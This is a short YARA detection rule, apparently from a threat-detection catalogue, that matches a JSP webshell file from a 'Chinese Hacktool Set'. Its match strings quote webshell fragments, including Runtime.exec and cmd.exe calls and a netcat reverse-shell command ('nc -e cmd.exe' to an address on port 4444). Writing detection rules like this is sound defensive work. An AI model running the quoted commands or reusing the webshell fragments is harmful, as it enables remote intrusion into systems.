Txt_jsp
Description
Chinese Hacktool Set - Webshells - file jsp.txt
Query · yara
strings:
$s1 = "program = \"cmd.exe /c net start > \" + SHELL_DIR" fullword ascii
$s2 = "Process pro = Runtime.getRuntime().exec(exe);" fullword ascii
$s3 = "<option value=\\\"nc -e cmd.exe 192.168.230.1 4444\\\">nc</option>\"" fullword ascii
$s4 = "cmd = \"cmd.exe /c set\";" fullword ascii
condition:
filesize < 715KB and 2 of them